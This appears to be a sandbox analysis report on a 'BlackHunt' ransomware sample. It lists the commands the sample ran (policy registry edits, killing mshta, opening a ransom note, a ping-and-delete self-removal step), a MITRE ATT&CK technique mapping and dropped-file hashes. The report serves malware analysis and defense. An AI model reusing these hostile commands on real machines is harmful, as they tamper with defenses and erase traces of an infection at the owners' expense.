C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:10172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:7376
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5888
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:9924
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:10084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:9564 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:8428
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe"2⤵PID:6816
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:10844
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8144
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10476
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2704
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:14324
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d0e2ef9c47a23e04c0edd09fa6de960d
SHA1300a0946b22abbdfbbc74995a3302fed849162ed
SHA256ecfef0976205505cef9c49fc8281a0c14dc476b65140e1b291bc10e29825d49c
SHA512f8e2a4570061a912adab0a295740d37ad8b6c10d7cf31ca3accf17456bbcfc5495f36159ba39cf0a2ae0f43e21457e3d133cf3835f3437da66a0d7c61ff201a9
-
Filesize
12KB
MD5f732c7aa3d8a1aaaac51cbfa0c95aefd
SHA1cbb52f27e9ae9e9dbc5b51f34bd593685f673c4d
SHA2568a651b5410218d7402d0b86f65e400f147a548aa99a5ae4095691a74af8abb09
SHA51296a358722a6173b6632dd04a0f9d16cc414763ceadbfaeca44220f5854a0b9cf2229e8405cfb3566bcc3770b522e8a4eb1061ab8a717643ad105f96ff2631b54
-
Filesize
684B
MD505f0095518b069bb53cd04a22dfa0af5
SHA124ab96f330e78e0d89a3f0c41f137d195a5ef9aa
SHA2568eb2b9833902e99c172b05a41f0d4832e228aa7ecabb48f3139007bd7497bc77
SHA5123bc7a47b89ab840dc6cff58ffcbc4abb8da427ae3d6f3c5d3f03d9fbc6c97b0d12506c0fbd4fcc4118522edf8f09383a1661ca817b1b12e55a0b70f7a82af948